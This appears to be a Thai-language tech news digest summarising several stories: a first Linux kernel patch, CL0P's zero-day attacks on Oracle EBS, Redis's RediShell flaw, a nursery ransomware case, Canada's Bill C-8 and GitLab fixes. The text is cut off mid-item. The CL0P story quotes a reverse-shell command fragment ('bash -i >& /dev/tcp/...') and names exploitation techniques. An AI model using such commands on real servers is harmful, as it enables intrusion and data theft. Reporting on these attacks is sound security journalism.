🧑‍💻 “จากเด็กอายุ 12 สู่ผู้ร่วมพัฒนาเคอร์เนล: Lifebook S2110 จุดประกายการแก้ไขไดรเวอร์ Linux ครั้งแรก” Valtteri Koskivuori นักพัฒนาสาย Linux ได้แชร์ประสบการณ์การส่ง patch แรกเข้าสู่เคอร์เนล Linux อย่างเป็นทางการ โดยเริ่มต้นจากความหลงใหลในโน้ตบุ๊กเก่ารุ่น Fujitsu Lifebook S2110 ที่เขาใช้มาตั้งแต่ปี 2005 แม้เครื่องจะมี RAM เพียง 2GB และใช้ฮาร์ดดิสก์แบบจานหมุน แต่ยังสามารถรัน Arch Linux รุ่นล่าสุดได้อย่างลื่นไหล แรงบันดาลใจของเขาเริ่มจากการสังเกตว่า “ปุ่ม hotkey” บนเครื่องทำงานได้เพียงครึ่งเดียว — โหมด Application ใช้งานได้ แต่โหมด Player กลับไม่มีการตอบสนองใด ๆ และมีข้อความแปลก ๆ ปรากฏใน kernel log ซึ่งนำไปสู่การสืบค้นโค้ดของไดรเวอร์ fujitsu-laptop.c ในเคอร์เนล หลังจากวิเคราะห์โค้ดอย่างละเอียด เขาพบว่าเครื่องของเขาไม่ได้อยู่ใน DMI table ที่ใช้เลือก keymap เฉพาะรุ่น จึงตัดสินใจสร้าง keymap ใหม่สำหรับ S2110 โดยเพิ่ม scancode ที่หายไป และแมปปุ่มให้ตรงกับฟังก์ชัน เช่น เล่นเพลง หยุดเพลง ย้อนเพลง และข้ามเพลง เมื่อทดสอบกับ xev และ playerctl พบว่าปุ่มทั้งหมดทำงานได้สมบูรณ์ เขาจึงส่ง patch นี้ไปยัง maintainer ของเคอร์เนลผ่านระบบ mailing list และในเวลาเพียงไม่กี่สัปดาห์ patch ก็ถูก merge เข้าสู่ Linux 6.15 และถูก backport ไปยังเวอร์ชัน LTS หลายรุ่น ✅ ข้อมูลสำคัญจากข่าว ➡️ Valtteri Koskivuori ส่ง patch แรกเข้าสู่เคอร์เนล Linux เพื่อแก้ไข hotkey บน Lifebook S2110 ➡️ ปุ่ม hotkey ทำงานได้ในโหมด Application แต่ไม่ตอบสนองในโหมด Player ➡️ พบข้อความ “Unknown GIRB result” ใน kernel log เมื่อกดปุ่มในโหมด Player ➡️ วิเคราะห์โค้ดใน fujitsu-laptop.c และพบว่าเครื่องไม่ได้อยู่ใน DMI table ➡️ สร้าง keymap ใหม่ keymap_s2110 และเพิ่ม scancode สำหรับปุ่มที่หายไป ➡️ ทดสอบด้วย xev และ playerctl พบว่าปุ่มทำงานได้ครบทุกฟังก์ชัน ➡️ ส่ง patch ผ่าน git send-email ไปยัง maintainer และ mailing list ➡️ Patch ถูก merge เข้าสู่ Linux 6.15 และ backport ไปยัง LTS หลายรุ่น ✅ ข้อมูลเสริมจากภายนอก ➡️ DMI table ใช้ระบุรุ่นของเครื่องเพื่อเลือก keymap ที่เหมาะสม ➡️ sparse_keymap_setup() เป็นฟังก์ชันที่ใช้แมป scancode กับ keycode ➡️ ACPI notify ใช้รับเหตุการณ์จาก firmware และส่งไปยัง input subsystem ➡️ playerctl ใช้ควบคุม media player ผ่าน D-Bus ด้วยโปรโตคอล MPRIS ➡️ การส่ง patch ผ่าน mailing list เป็นวิธีดั้งเดิมที่ยังใช้ในเคอร์เนล Linux https://vkoskiv.com/first-linux-patch/

💥 “CL0P โจมตี Oracle EBS ด้วยช่องโหว่ Zero-Day CVE-2025-61882 — ขโมยข้อมูลองค์กรผ่าน RCE โดยไม่ต้องล็อกอิน” Google Threat Intelligence Group (GTIG) และ Mandiant ได้เปิดเผยแคมเปญการโจมตีขนาดใหญ่โดยกลุ่ม CL0P ที่มุ่งเป้าไปยัง Oracle E-Business Suite (EBS) ซึ่งเป็นระบบ ERP ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลก โดยใช้ช่องโหว่ Zero-Day ที่เพิ่งถูกระบุว่าเป็น CVE-2025-61882 ซึ่งมีความรุนแรงระดับ “วิกฤต” ด้วยคะแนน CVSS 9.8 การโจมตีเริ่มต้นตั้งแต่เดือนกรกฎาคม 2025 โดยแฮกเกอร์สามารถเข้าถึงระบบ Oracle EBS ได้โดยไม่ต้องล็อกอิน ผ่านช่องโหว่ในคอมโพเนนต์ BI Publisher Integration ของระบบ Concurrent Processing โดยใช้เทคนิค SSRF, CRLF injection, การข้ามการยืนยันตัวตน และการฉีด XSL template เพื่อรันคำสั่งบนเซิร์ฟเวอร์ เมื่อเข้าระบบได้แล้ว ผู้โจมตีใช้ payload แบบ Java ที่ซับซ้อน เช่น GOLDVEIN.JAVA และ SAGEGIFT/SAGELEAF/SAGEWAVE เพื่อสร้าง backdoor และควบคุมระบบอย่างต่อเนื่อง โดย payload เหล่านี้สามารถหลบเลี่ยงการตรวจจับจากระบบป้องกันทั่วไปได้ แฮกเกอร์ใช้บัญชี “applmgr” ซึ่งเป็นบัญชีหลักของ Oracle EBS ในการสำรวจระบบและรันคำสั่ง เช่น ifconfig, netstat, และ bash -i >& /dev/tcp/... เพื่อเปิด shell แบบ interactive บนเซิร์ฟเวอร์ ในช่วงปลายเดือนกันยายน ผู้บริหารจากหลายองค์กรเริ่มได้รับอีเมลข่มขู่จาก CL0P โดยอ้างว่าข้อมูลจากระบบ Oracle EBS ถูกขโมยไปแล้ว พร้อมแนบรายการไฟล์จริงเพื่อยืนยันการโจมตี และเสนอให้จ่ายเงินเพื่อไม่ให้ข้อมูลถูกเผยแพร่บนเว็บไซต์ CL0P DLS Oracle ได้ออก patch ฉุกเฉินเมื่อวันที่ 4 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่ CVE-2025-61882 และแนะนำให้ลูกค้าทุกคนอัปเดตทันที พร้อมแจก Indicators of Compromise (IoCs) เพื่อช่วยตรวจสอบการบุกรุก ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-61882 เป็น Zero-Day ใน Oracle EBS ที่ถูกใช้โจมตีโดย CL0P ➡️ ช่องโหว่เกิดใน BI Publisher Integration ของ Concurrent Processing ➡️ ใช้เทคนิค SSRF, CRLF injection, auth bypass และ XSL template injection ➡️ แฮกเกอร์สามารถรันคำสั่งบนเซิร์ฟเวอร์โดยไม่ต้องล็อกอิน ➡️ ใช้ payload Java เช่น GOLDVEIN.JAVA และ SAGE* เพื่อสร้าง backdoor ➡️ ใช้บัญชี applmgr เพื่อสำรวจระบบและเปิด shell ➡️ ส่งอีเมลข่มขู่ผู้บริหารพร้อมรายการไฟล์จริงจากระบบที่ถูกเจาะ ➡️ Oracle ออก patch ฉุกเฉินเมื่อ 4 ตุลาคม 2025 พร้อมแจก IoCs ✅ ข้อมูลเสริมจากภายนอก ➡️ Oracle EBS ใช้ในระบบสำคัญขององค์กร เช่น การเงิน, HR, โลจิสติกส์ ➡️ CL0P เคยโจมตี MOVEit, Cleo และ GoAnywhere ด้วย Zero-Day ลักษณะเดียวกัน ➡️ SSRF เป็นเทคนิคที่ใช้หลอกให้เซิร์ฟเวอร์เรียกข้อมูลจากแหล่งที่ผู้โจมตีควบคุม ➡️ XSLT injection สามารถใช้เรียกฟังก์ชัน Java เพื่อรันคำสั่งในระบบ ➡️ GOLDVEIN.JAVA ใช้การปลอม handshake TLS เพื่อหลบการตรวจจับ https://securityonline.info/cl0p-extortion-google-mandiant-expose-zero-day-rce-in-oracle-e-business-suite-cve-2025-61882/

💡 “NTT สร้างชิปแสงอัจฉริยะตัวแรกของโลก — เปลี่ยนคลื่นแสงให้กลายเป็นเครื่องมือคำนวณที่ปรับเปลี่ยนได้ทันที” NTT Research ร่วมกับมหาวิทยาลัย Cornell และ Stanford ได้เปิดตัวเทคโนโลยีใหม่ที่อาจเปลี่ยนโฉมวงการออปติกและควอนตัมคอมพิวติ้งไปตลอดกาล — ชิปแสงแบบ nonlinear photonics ที่สามารถ “โปรแกรม” ฟังก์ชันได้แบบเรียลไทม์บนชิปเดียว โดยไม่ต้องผลิตอุปกรณ์ใหม่สำหรับแต่ละฟังก์ชันอีกต่อไป เทคโนโลยีนี้ใช้แกนกลางเป็นวัสดุ silicon nitride ที่สามารถปรับเปลี่ยนคุณสมบัติไม่เชิงเส้น (nonlinearity) ได้ด้วยการฉายแสงแบบมีโครงสร้าง (structured light) ลงบนชิป ซึ่งจะสร้างรูปแบบการตอบสนองของแสงที่แตกต่างกันไปตามลวดลายของแสงที่ฉาย ทำให้ชิปเดียวสามารถทำงานได้หลากหลาย เช่น สร้างคลื่นแสงแบบกำหนดเอง, สร้างฮาร์มอนิกที่ปรับได้, สร้างแสง holographic และออกแบบฟังก์ชันแบบย้อนกลับ (inverse design) ได้ทันที งานวิจัยนี้ตีพิมพ์ในวารสาร Nature เมื่อวันที่ 8 ตุลาคม 2025 และจะตีพิมพ์ฉบับพิมพ์ในเดือนพฤศจิกายน โดยนักวิจัย Ryotatsu Yanagimoto จาก NTT Research เป็นผู้นำทีมภายใต้การดูแลของศาสตราจารย์ Peter McMahon จาก Cornell ผลลัพธ์ของงานนี้คือการ “ทำลายกรอบเดิม” ที่อุปกรณ์แสงหนึ่งตัวทำได้เพียงหนึ่งฟังก์ชัน ซึ่งเคยเป็นข้อจำกัดใหญ่ของวงการ photonics โดยเฉพาะในงานที่ต้องการความยืดหยุ่นสูง เช่น การสื่อสารด้วยแสง, คอมพิวเตอร์ควอนตัม, การสร้างแหล่งกำเนิดแสงที่ปรับได้ และการวิเคราะห์คลื่นแสงในงานวิทยาศาสตร์ ✅ ข้อมูลสำคัญจากข่าว ➡️ NTT Research ร่วมกับ Cornell และ Stanford พัฒนาชิป nonlinear photonics ที่โปรแกรมได้ ➡️ ใช้ structured light เพื่อปรับเปลี่ยนคุณสมบัติไม่เชิงเส้นของวัสดุ silicon nitride ➡️ ชิปสามารถทำงานได้หลายฟังก์ชัน เช่น pulse shaping, second-harmonic generation, holography ➡️ งานวิจัยตีพิมพ์ในวารสาร Nature เมื่อวันที่ 8 ตุลาคม 2025 ➡️ นำโดยนักวิจัย Ryotatsu Yanagimoto ภายใต้การดูแลของศาสตราจารย์ Peter McMahon ➡️ ชิปสามารถปรับฟังก์ชันแบบเรียลไทม์และทนต่อข้อผิดพลาดจากการผลิต ➡️ เปลี่ยนแนวคิด “one device, one function” เป็น “one chip, many functions” ➡️ มีศักยภาพในการใช้งานใน quantum computing, optical communication, sensing และ imaging ✅ ข้อมูลเสริมจากภายนอก ➡️ ตลาด photonic-integrated circuits คาดว่าจะมีมูลค่ากว่า $50 พันล้านภายในปี 2035 ➡️ structured light ถูกใช้ในงาน imaging, holography และการควบคุมแสงในระดับนาโน ➡️ inverse design คือการออกแบบฟังก์ชันโดยเริ่มจากผลลัพธ์ที่ต้องการ แล้วหาวิธีสร้าง ➡️ quantum frequency conversion เป็นเทคนิคสำคัญในการเชื่อมโยงระบบควอนตัมต่างชนิด ➡️ photonics เป็นเทคโนโลยีหลักในการลดพลังงานและเพิ่มความเร็วของการประมวลผล https://www.techpowerup.com/341717/ntt-research-collaboration-breaks-the-one-device-one-function-paradigm-with-worlds-first-programmable-nonlinear-photonics-chip

🚨 “จับสองวัยรุ่นอังกฤษ โจมตีแรนซัมแวร์ใส่ศูนย์เด็ก Kido — ข้อมูลเด็ก 8,000 คนถูกขโมยและขู่เรียกค่าไถ่” ตำรวจนครบาลลอนดอน (Met Police) ได้จับกุมวัยรุ่นชายอายุ 17 ปีสองคนในเมือง Bishop’s Stortford, Hertfordshire เมื่อวันที่ 7 ตุลาคม 2025 จากข้อหาการใช้คอมพิวเตอร์ในทางมิชอบและการแบล็กเมล์ หลังจากเกิดเหตุโจมตีแรนซัมแวร์ต่อเครือข่ายศูนย์เด็ก Kido ซึ่งมีสาขาทั่วลอนดอน กลุ่มแฮกเกอร์ที่เรียกตัวเองว่า “Radiant” ได้อ้างความรับผิดชอบในการโจมตี โดยสามารถเข้าถึงข้อมูลส่วนตัวของเด็กกว่า 8,000 คนและครอบครัวผ่านซอฟต์แวร์ Famly ที่ศูนย์เด็กใช้ในการจัดการข้อมูล แม้ Famly จะยืนยันว่าโครงสร้างพื้นฐานของตนไม่ถูกเจาะ แต่การเข้าถึงผ่านบัญชีผู้ใช้ก็เพียงพอให้ Radiant ขโมยข้อมูลสำคัญ เช่น ชื่อ ที่อยู่ รูปถ่าย ข้อมูลติดต่อของผู้ปกครอง และบันทึกทางการแพทย์ที่เป็นความลับ Radiant ได้เรียกร้องค่าไถ่ประมาณ £600,000 เป็น Bitcoin และใช้วิธีการกดดันที่รุนแรง เช่น โทรหาผู้ปกครองโดยตรง และโพสต์ภาพเด็กบางคนลงใน dark web เพื่อบีบให้ศูนย์เด็กจ่ายเงิน อย่างไรก็ตาม กลุ่มนี้กลับได้รับเสียงประณามอย่างหนัก แม้แต่จากแฮกเกอร์ด้วยกัน จนสุดท้าย Radiant ได้เบลอภาพและประกาศลบข้อมูลทั้งหมดเมื่อวันที่ 2 ตุลาคม ตำรวจ Met ยืนยันว่ากำลังดำเนินการสอบสวนอย่างจริงจัง โดย Will Lyne หัวหน้าฝ่ายอาชญากรรมไซเบอร์กล่าวว่า “นี่เป็นก้าวสำคัญในการนำผู้กระทำผิดเข้าสู่กระบวนการยุติธรรม” ขณะที่ศูนย์เด็ก Kido ก็ออกแถลงการณ์ขอบคุณการดำเนินการของตำรวจ เหตุการณ์นี้สะท้อนถึงความเปราะบางของภาคการศึกษา โดยเฉพาะศูนย์เด็กและโรงเรียนที่มักมีงบประมาณด้าน IT จำกัด ทำให้ตกเป็นเป้าหมายของแรนซัมแวร์บ่อยครั้ง รายงานจาก Sophos และ AtlastVPN เคยระบุว่า 80% ของผู้ให้บริการการศึกษาระดับต้นเคยถูกโจมตีด้วยแรนซัมแวร์ภายในหนึ่งปี ✅ ข้อมูลสำคัญจากข่าว ➡️ ตำรวจ Met จับกุมวัยรุ่นชายสองคนจากข้อหาใช้คอมพิวเตอร์ในทางมิชอบและแบล็กเมล์ ➡️ เหตุโจมตีเกิดขึ้นกับศูนย์เด็ก Kido ซึ่งมีข้อมูลเด็กกว่า 8,000 คนถูกขโมย ➡️ ข้อมูลที่ถูกขโมยรวมถึงชื่อ ที่อยู่ รูปถ่าย และบันทึกทางการแพทย์ ➡️ กลุ่มแฮกเกอร์ Radiant เรียกร้องค่าไถ่ £600,000 เป็น Bitcoin ➡️ Radiant โทรหาผู้ปกครองและโพสต์ภาพเด็กใน dark web เพื่อกดดัน ➡️ หลังถูกประณาม กลุ่ม Radiant เบลอภาพและประกาศลบข้อมูล ➡️ ตำรวจ Met ยืนยันดำเนินการสอบสวนอย่างจริงจัง ➡️ ศูนย์เด็ก Kido ขอบคุณการดำเนินการของตำรวจ ✅ ข้อมูลเสริมจากภายนอก ➡️ Famly เป็นซอฟต์แวร์จัดการศูนย์เด็กที่ใช้กันแพร่หลายในยุโรป ➡️ ข้อมูลเด็กเป็นเป้าหมายของแฮกเกอร์ เพราะมีประวัติเครดิตสะอาดและยากต่อการตรวจพบ ➡️ การโจมตีแรนซัมแวร์ในภาคการศึกษามักเกิดจาก phishing และการตั้งค่าความปลอดภัยต่ำ ➡️ กลุ่มแฮกเกอร์วัยรุ่น เช่น Lapsus$ และ Scattered Spider เคยโจมตีองค์กรใหญ่หลายแห่ง ➡️ การโจมตีข้อมูลเด็กถือเป็น “จุดต่ำสุดใหม่” ของอาชญากรรมไซเบอร์ https://hackread.com/uk-police-arrest-teens-kido-nursery-ransomware-attack/

🛡️ “Miggo Security คว้าตำแหน่ง Gartner Cool Vendor — พลิกเกมป้องกันภัยไซเบอร์ในยุค AI ด้วยการตรวจจับแบบเรียลไทม์” ในวันที่ AI กลายเป็นทั้งเครื่องมือสร้างสรรค์และช่องทางโจมตีใหม่สำหรับภัยไซเบอร์ บริษัท Miggo Security จาก Tel Aviv ได้รับการยกย่องจาก Gartner ให้เป็นหนึ่งใน “Cool Vendor” ด้าน AI Security ประจำปี 2025 จากความสามารถในการตรวจจับและตอบสนองภัยคุกคามในแอปพลิเคชันแบบเรียลไทม์ ผ่านแพลตฟอร์ม Application Detection & Response (ADR) Miggo มุ่งเน้นการแก้ปัญหา “ช่องว่างระหว่างการตรวจจับและการตอบสนอง” ซึ่งเป็นจุดอ่อนของระบบรักษาความปลอดภัยแบบเดิม โดยใช้เทคโนโลยี DeepTracing ที่สามารถตรวจจับภัยคุกคามใหม่ ๆ เช่น zero-day และรูปแบบการโจมตีที่เกิดขึ้นเฉพาะในแอปพลิเคชันที่มี AI ฝังอยู่ แพลตฟอร์มของ Miggo ยังมีฐานข้อมูล AppDNA และ Predictive Vulnerability Database ที่ช่วยลด backlog ของช่องโหว่ได้ถึง 99% โดยใช้ AI วิเคราะห์บริบทของแอปพลิเคชันและจัดลำดับความสำคัญของช่องโหว่ที่ควรแก้ก่อน นอกจากนี้ยังมีฟีเจอร์ WAF Copilot ที่สามารถสร้างกฎป้องกันเว็บแอปพลิเคชันแบบ custom ได้ภายในไม่กี่นาที และระบบ Agentless Integration ที่สามารถติดตั้งร่วมกับ Kubernetes และระบบ CI/CD ได้โดยไม่ต้องเปลี่ยนโครงสร้างเดิม Gartner เตือนว่า “ภายในปี 2029 กว่า 50% ของการโจมตีไซเบอร์ที่สำเร็จต่อ AI agents จะเกิดจากการเจาะระบบควบคุมสิทธิ์ เช่น prompt injection” ซึ่งทำให้การป้องกันแบบ runtime และการวิเคราะห์พฤติกรรมของแอปพลิเคชันกลายเป็นสิ่งจำเป็น CEO ของ Miggo, Daniel Shechter กล่าวว่า “การได้รับการยอมรับจาก Gartner คือการยืนยันว่า ADR คืออนาคตของการรักษาความปลอดภัยในยุค AI” โดยเน้นว่าองค์กรต้องสามารถ “รู้ พิสูจน์ และป้องกัน” ภัยคุกคามที่เกิดขึ้นในแอปพลิเคชันได้ทันที ✅ ข้อมูลสำคัญจากข่าว ➡️ Miggo Security ได้รับการยกย่องเป็น Gartner Cool Vendor ด้าน AI Security ปี 2025 ➡️ ใช้แพลตฟอร์ม Application Detection & Response (ADR) สำหรับการตรวจจับแบบ runtime ➡️ เทคโนโลยี DeepTracing ตรวจจับ AI-native threats และ zero-day ได้แบบเรียลไทม์ ➡️ ฐานข้อมูล AppDNA และ Predictive Vulnerability Database ลด backlog ช่องโหว่ได้ 99% ➡️ WAF Copilot สร้างกฎป้องกันเว็บแอปแบบ custom ได้ภายในไม่กี่นาที ➡️ Agentless Integration รองรับ Kubernetes และระบบ CI/CD โดยไม่ต้องติดตั้ง agent ➡️ Gartner เตือนภัย prompt injection จะเป็นช่องโหว่หลักของ AI agents ภายในปี 2029 ➡️ CEO Daniel Shechter ยืนยันว่า ADR คืออนาคตของการรักษาความปลอดภัยในยุค AI ✅ ข้อมูลเสริมจากภายนอก ➡️ Prompt injection คือการแทรกคำสั่งใน input เพื่อควบคุมพฤติกรรมของ AI ➡️ Zero-day คือช่องโหว่ที่ยังไม่มีแพตช์แก้ไข และมักถูกใช้ในการโจมตีขั้นสูง ➡️ Runtime security คือการตรวจสอบพฤติกรรมของแอปพลิเคชันขณะทำงานจริง ➡️ Gartner Cool Vendor เป็นการยกย่องบริษัทที่มีนวัตกรรมโดดเด่นในอุตสาหกรรม ➡️ การใช้ AI ในระบบรักษาความปลอดภัยช่วยลดเวลาในการตอบสนองและเพิ่มความแม่นยำ https://hackread.com/miggo-security-named-a-gartner-cool-vendor-in-ai-security/

🔥 “RediShell — ช่องโหว่ 13 ปีใน Redis ที่เปิดประตูให้แฮกเกอร์ยึดเซิร์ฟเวอร์กว่า 60,000 เครื่องทั่วโลก” Redis ฐานข้อมูลแบบ in-memory ที่ใช้กันอย่างแพร่หลายในระบบคลาวด์ทั่วโลก กำลังเผชิญกับช่องโหว่ร้ายแรงที่ถูกค้นพบในปี 2025 โดยนักวิจัยจาก Wiz ซึ่งตั้งชื่อว่า “RediShell” (CVE-2025-49844) ช่องโหว่นี้มีคะแนนความรุนแรง CVSS เต็ม 10.0 และถูกซ่อนอยู่ในโค้ดของ Redis มานานกว่า 13 ปีโดยไม่มีใครตรวจพบ จุดอ่อนเกิดจากบั๊กประเภท use-after-free ใน Lua interpreter ของ Redis ซึ่งเป็นฟีเจอร์ที่เปิดใช้งานโดยค่าเริ่มต้น ผู้โจมตีสามารถส่งสคริปต์ Lua ที่ถูกออกแบบมาอย่างเจาะจงเพื่อหลบหนีจาก sandbox และรันคำสั่ง native บนเซิร์ฟเวอร์ได้โดยตรง ส่งผลให้สามารถขโมยข้อมูล ติดตั้งมัลแวร์ หรือใช้เซิร์ฟเวอร์ที่ถูกยึดเพื่อโจมตีระบบอื่นต่อได้ จากการสแกนของ Wiz พบว่า Redis ถูกใช้งานในกว่า 75% ของระบบคลาวด์ และมี Redis instance ที่เปิดให้เข้าถึงจากอินเทอร์เน็ตกว่า 330,000 เครื่อง โดยประมาณ 60,000 เครื่องไม่มีระบบ authentication ใด ๆ ทำให้เสี่ยงต่อการถูกโจมตีโดยไม่ต้องยืนยันตัวตน Redis ได้ออกแพตช์แก้ไขเมื่อวันที่ 3 ตุลาคม 2025 และแนะนำให้ผู้ดูแลระบบอัปเดตทันที พร้อมตั้งค่าความปลอดภัยเพิ่มเติม เช่น ปิด Lua scripting หากไม่จำเป็น ใช้บัญชี non-root และจำกัดการเข้าถึงผ่าน firewall หรือ VPC RediShell เป็นตัวอย่างชัดเจนของ “หนี้ทางเทคนิค” ที่สะสมในโค้ดโอเพ่นซอร์ส และแสดงให้เห็นว่าการตั้งค่าระบบที่ไม่รัดกุมสามารถเปิดช่องให้เกิดการโจมตีระดับร้ายแรงได้ แม้จะไม่มีหลักฐานว่าช่องโหว่นี้ถูกใช้โจมตีจริงในขณะนี้ แต่ความเสี่ยงที่เกิดขึ้นถือว่าสูงมาก โดยเฉพาะในระบบที่เปิดสู่สาธารณะ ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ RediShell (CVE-2025-49844) เป็นบั๊ก use-after-free ใน Lua interpreter ของ Redis ➡️ ผู้โจมตีสามารถส่ง Lua script เพื่อหลบหนี sandbox และรันคำสั่ง native บนเซิร์ฟเวอร์ ➡️ มี Redis instance เปิดสู่สาธารณะกว่า 330,000 เครื่อง โดย 60,000 ไม่มี authentication ➡️ Redis ใช้ในกว่า 75% ของระบบคลาวด์ทั่วโลก ➡️ Redis ออกแพตช์แก้ไขเมื่อวันที่ 3 ตุลาคม 2025 ➡️ Wiz ค้นพบช่องโหว่นี้ในงาน Pwn2Own Berlin และแจ้ง Redis ล่วงหน้า ➡️ แนะนำให้ปิด Lua scripting หากไม่จำเป็น และใช้บัญชี non-root ➡️ ควรจำกัดการเข้าถึง Redis ด้วย firewall หรือ VPC ➡️ เปิดระบบ logging และ monitoring เพื่อจับพฤติกรรมผิดปกติ ✅ ข้อมูลเสริมจากภายนอก ➡️ Lua เป็นภาษา lightweight ที่นิยมใช้ใน embedded systems และเกม ➡️ use-after-free เป็นบั๊กที่เกิดจากการใช้ memory หลังจากถูกปล่อยคืนแล้ว ➡️ Redis เคยถูกโจมตีด้วยมัลแวร์ เช่น P2PInfect, Redigo, HeadCrab และ Migo ➡️ Redis container บน Docker มักไม่มีการตั้งค่า authentication โดยค่าเริ่มต้น ➡️ การตั้งค่า bind 0.0.0.0 ใน Docker Compose อาจเปิด Redis สู่สาธารณะโดยไม่ตั้งใจ https://hackread.com/13-year-old-redishell-vulnerability-redis-servers-risk/

🛑 “แคนาดาเสนอร่างกฎหมาย C-8 — เปิดช่องให้รัฐตัดอินเทอร์เน็ตบุคคลใดก็ได้โดยไม่ต้องมีหมายศาล” ในช่วงต้นเดือนตุลาคม 2025 รัฐบาลแคนาดาได้เสนอร่างกฎหมาย C-8 ซึ่งกำลังอยู่ในขั้นตอนการพิจารณาในสภาผู้แทนราษฎร โดยมีสาระสำคัญคือการให้อำนาจรัฐในการ “ตัดการเข้าถึงอินเทอร์เน็ต” ของบุคคลที่ถูกระบุว่าเป็น “บุคคลที่ระบุไว้” (specified persons) โดยไม่ต้องผ่านกระบวนการยุติธรรมล่วงหน้า ร่างกฎหมายนี้จะปรับแก้พระราชบัญญัติการสื่อสารโทรคมนาคม (Telecommunications Act) โดยเพิ่มบทบัญญัติที่ให้อำนาจรัฐมนตรีอุตสาหกรรม (ปัจจุบันคือ Mélanie Joly) ร่วมกับรัฐมนตรีความมั่นคงสาธารณะ (Gary Anandasangaree) ในการสั่งให้ผู้ให้บริการอินเทอร์เน็ต เช่น Rogers หรือ Telus “หยุดให้บริการแก่บุคคลใดก็ได้” ที่รัฐเห็นว่าเป็นภัยต่อความมั่นคงไซเบอร์ สิ่งที่น่ากังวลคือ คำสั่งนี้ไม่ต้องมีหมายศาล และการตรวจสอบโดยศาลจะเกิดขึ้น “หลังจาก” ที่มีการตัดบริการไปแล้ว กล่าวคือ บุคคลที่ถูกตัดอินเทอร์เน็ตจะไม่มีโอกาสโต้แย้งหรือรับรู้ล่วงหน้า รัฐบาลให้เหตุผลว่า กฎหมายนี้จำเป็นต่อการรับมือกับภัยคุกคามไซเบอร์ที่รุนแรงขึ้น เช่น การโจมตีจากแฮกเกอร์ การขโมยข้อมูลจากรัฐ และการแทรกแซงระบบโครงสร้างพื้นฐานที่สำคัญ โดยระบุว่า “เพื่อปกป้องระบบโทรคมนาคมของแคนาดาจากการแทรกแซง การบิดเบือน การหยุดชะงัก หรือการเสื่อมถอย” อย่างไรก็ตาม นักวิจารณ์จากสมาคมสิทธิเสรีภาพพลเมืองแคนาดา (CCLA) เตือนว่า ร่างกฎหมายนี้ให้อำนาจรัฐมากเกินไปในการสอดแนมและควบคุมข้อมูลโดยไม่ต้องแจ้งให้ประชาชนทราบ และอาจนำไปสู่การลดทอนมาตรฐานการเข้ารหัสข้อมูลของเอกชน ที่สำคัญคือ ร่างกฎหมายนี้ขัดแย้งกับจุดยืนเดิมของรัฐบาลแคนาดา ที่เคยประกาศว่า “การเข้าถึงอินเทอร์เน็ตคือสิทธิมนุษยชน” และเคยเป็นสมาชิกผู้ก่อตั้งของ Freedom Online Coalition ซึ่งส่งเสริมเสรีภาพออนไลน์ทั่วโลก ✅ ข้อมูลสำคัญจากข่าว ➡️ ร่างกฎหมาย C-8 ให้อำนาจรัฐในการตัดอินเทอร์เน็ตของบุคคลที่ถูกระบุว่าเป็นภัย ➡️ ไม่ต้องมีหมายศาล และการตรวจสอบโดยศาลจะเกิดหลังจากมีคำสั่งแล้ว ➡️ รัฐมนตรีอุตสาหกรรมและรัฐมนตรีความมั่นคงสามารถออกคำสั่งร่วมกันได้ ➡️ ผู้ให้บริการอินเทอร์เน็ตต้องปฏิบัติตามคำสั่งโดยไม่มีสิทธิ์ปฏิเสธ ➡️ เหตุผลของรัฐคือเพื่อรับมือกับภัยคุกคามไซเบอร์ เช่น แฮกเกอร์และการแทรกแซงระบบ ➡️ ร่างกฎหมายนี้แก้ไขพระราชบัญญัติการสื่อสารโทรคมนาคมของแคนาดา ➡️ มีการวิจารณ์จาก CCLA ว่าอาจนำไปสู่การสอดแนมและลดมาตรฐานการเข้ารหัส ➡️ ขัดแย้งกับจุดยืนเดิมของรัฐบาลที่เคยสนับสนุนเสรีภาพออนไลน์ ✅ ข้อมูลเสริมจากภายนอก ➡️ Freedom Online Coalition เป็นองค์กรระหว่างประเทศที่ส่งเสริมเสรีภาพอินเทอร์เน็ต ➡️ หลายประเทศ เช่น เยอรมนีและเนเธอร์แลนด์ เคยวิจารณ์การควบคุมอินเทอร์เน็ตของรัฐ ➡️ การตัดอินเทอร์เน็ตของบุคคลอาจกระทบสิทธิในการแสดงออกและการเข้าถึงข้อมูล ➡️ การสอดแนมโดยไม่แจ้งล่วงหน้าอาจละเมิดสิทธิในความเป็นส่วนตัวตามกฎบัตรสิทธิ ➡️ การลดมาตรฐานการเข้ารหัสอาจทำให้ข้อมูลของประชาชนตกอยู่ในความเสี่ยง https://nationalpost.com/opinion/canadian-bill-would-strip-internet-access-from-specified-persons

🔐 “GitLab อุดช่องโหว่ร้ายแรงใน GraphQL API — เสี่ยงเขียนข้อมูลโดยไม่ได้รับอนุญาต และโจมตีระบบให้ล่มจากระยะไกล” GitLab ได้ออกแพตช์อัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรง 2 รายการใน GraphQL API ที่ส่งผลกระทบต่อทั้ง Community Edition (CE) และ Enterprise Edition (EE) โดยช่องโหว่เหล่านี้อาจเปิดโอกาสให้ผู้โจมตีสามารถเขียนข้อมูลโดยไม่ได้รับอนุญาต หรือทำให้ระบบ GitLab ไม่ตอบสนองผ่านการโจมตีแบบ denial-of-service (DoS) ช่องโหว่แรกคือ CVE-2025-11340 ซึ่งมีคะแนนความรุนแรง CVSS 7.7 โดยเปิดช่องให้ผู้ใช้ที่มี API token แบบ read-only สามารถเขียนข้อมูลลงใน vulnerability records ได้โดยไม่ควรเกิดขึ้น ซึ่งเป็นการละเมิดขอบเขตสิทธิ์อย่างชัดเจน ช่องโหว่ที่สองคือ CVE-2025-10004 มีคะแนน CVSS 7.5 และสามารถถูกโจมตีจากระยะไกลโดยไม่ต้องมีการยืนยันตัวตน ผู้โจมตีสามารถส่ง GraphQL query ที่ร้องขอ blob ขนาดใหญ่มากจาก repository ซึ่งจะทำให้ระบบ GitLab ทำงานช้าลงหรือไม่ตอบสนองเลย GitLab ได้ออกแพตช์สำหรับเวอร์ชัน 18.4.2, 18.3.4 และ 18.2.8 พร้อมแนะนำให้ผู้ดูแลระบบที่ใช้ GitLab แบบ self-managed รีบอัปเดตทันที เพื่อป้องกันการโจมตีที่อาจเกิดขึ้น โดยเฉพาะในระบบที่เปิดให้เข้าถึงจากสาธารณะ นอกจากนี้ยังมีการแก้ไขช่องโหว่ระดับกลางและต่ำ เช่น CVE-2025-9825 (เกี่ยวกับ CI/CD variables) และ CVE-2025-2934 